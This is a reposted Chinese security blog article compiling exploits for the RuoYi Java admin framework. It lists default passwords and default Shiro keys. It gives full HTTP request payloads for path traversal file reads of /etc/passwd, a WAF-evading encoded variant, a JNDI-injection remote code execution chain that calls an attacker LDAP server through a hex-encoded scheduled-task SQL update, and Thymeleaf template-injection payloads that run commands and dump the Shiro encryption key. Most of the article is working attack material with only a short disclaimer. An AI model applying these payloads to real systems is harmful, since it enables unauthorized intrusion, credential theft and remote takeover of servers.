2026-01-12 01:19:36 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文汇总若依RuoYi框架单应用版本的高危漏洞，包括弱口令、默认Shiro密钥、后台SQL注入及任意文件下载。详细复现了CVE-2023-27025路径穿越、4.7.1-4.7.8版本定时任务JNDI注入RCE，以及4.7.9-4.8.2版本利用ThymeleafSSTI窃取Shiro密钥的攻击链。文章提供了具体受影响版本与Payload，建议及时升级并修补相关接口。 综合评分： 87 文章分类： 漏洞分析,WEB安全,代码审计,漏洞POC,渗透测试

cover_image

Ruoyi单应用版本漏洞合集

安全艺术

2026年1月11日 08:40 北京

若依有很多版本，其中使用最多的是Ruoyi单应用版本（RuoYi），Ruoyi前后端分离版本（RuoYi-Vue），Ruoyi微服务版本（RuoYi-Cloud），Ruoyi移动版本（RuoYi-App）。

1. RuoYi 弱口令

用户：admin ruoyi druid ry
密码：123456 admin druid admin123 admin888 admin@123

2. RuoYi Shiro默认密钥

# RuoYi 版本号对象版本的默认AES密钥
# 4.6.1-4.3.1
zSyK5Kp6PZAAjlT+eeNMlg==
#3.4-及以下
fCq+/xW488hMTCD+cmJ3aQ==

3. RuoYi 后台SQL注入

RuoYi-4.6.0代码审计之SQL注入漏洞1

安全艺术，公众号：安全艺术RuoYi-4.6.0代码审计之SQL注入漏洞1

RuoYi 后台SQL注入漏洞系列2

安全艺术，公众号：安全艺术RuoYi 后台SQL注入漏洞系列2

4. RuoYi CNVD-2021-01931 后台任意文件下载

RuoYi<4.5.1

/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini

5. RuoYi CVE-2023-27025 后台任意文件下载

RuoYi<= 4.7.6

POST /monitor/job/add HTTP/1.1
Host: 192.168.3.102
Content-Length: 278
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive

createBy=admin&jobId=666&jobName=test111&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('D:\@CodeAudit\Code\RuoYi\RuoYi-4.7.6\RuoYi-4.7.6\ruoyi-admin\src\main\resources\application-druid.yml')&cronExpression=0%2F10+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=

POST /monitor/job/run HTTP/1.1
Host: 192.168.3.102
Content-Length: 9
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive

jobId=666

清除日志

POST /monitor/jobLog/clean HTTP/1.1
Host: 192.168.3.102
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

触发任意文件下载

GET /common/download/resource?resource=1.txt HTTP/1.1
Host: 192.168.3.102
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive

读win.ini

对路径参数进行 URL 编码或 Unicode 编码，绕过 WAF 检测：

invokeTarget=ruoYiConfig.setProfile('%2F%65%74%63%2F%70%61%73%73%77%64')

6. RuoYi 4.7.1-4.7.8后台定时任务RCE

java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C calc -A 192.168.3.102

javax.naming.InitialContext.lookup('ldap://192.168.3.102:1389/deserialJackson')

将上述内容转换成16进制

https://www.bejson.com/convert/ox2str/

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target=0x(16进制数据) WHERE job_id = 1;')

新增定时任务

调用目标字符串

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target=0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e332e3130323a313338392f646573657269616c4a61636b736f6e2729 WHERE job_id = 1;')

cron表达式：

* * * * * ?

执行一次

该任务执行结束会向任务编号为1的任务写入目标字符串，执行这个任务1可触发RCE。

4.7.9加了白名单限制

7. RuoYi 4.7.9-4.8.2后台存在SSTI漏洞(获取Shiro密钥)

7.1. Thymeleaf模板注入

POST /monitor/cache/getNames HTTP/1.1
Host: 192.168.3.105
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.105
Referer: http://192.168.3.105/system/dept/edit/103
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=e08dc9e6-5445-4016-8d01-ab20a00d7359
Connection: keep-alive

fragment=header((${T (java.lang.Runtime).getRuntime().exec("calc")}))

POST /monitor/cache/getNames HTTP/1.1
Host: 192.168.3.105
Content-Length: 205
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.105
Referer: http://192.168.3.105/system/dept/edit/103
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=e08dc9e6-5445-4016-8d01-ab20a00d7359
Connection: keep-alive

fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x

登录接口利用shiro的key直接R。

其它接口，全局搜索。

/monitor/cache/getKeys
/monitor/cache/getValue
/demo/form/localrefresh/task

POST /monitor/cache/getKeys HTTP/1.1
Host: 192.168.3.102
Content-Length: 229
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=de6b9984-128c-417e-a91a-a106bc0cccb0
Connection: keep-alive

cacheName=1&cacheKeys=1&fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x

POST /monitor/cache/getValue HTTP/1.1
Host: 192.168.3.102
Content-Length: 241
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=de6b9984-128c-417e-a91a-a106bc0cccb0
Connection: keep-alive

cacheName=1&cacheKey=1&cacheValue=1&fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x

POST /demo/form/localrefresh/task HTTP/1.1
Host: 192.168.3.102
Content-Length: 226
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=de6b9984-128c-417e-a91a-a106bc0cccb0
Connection: keep-alive

name=1&type=1&date=1&fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x

更多内容欢迎进群了解。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术安全艺术《Ruoyi单应用版本漏洞合集》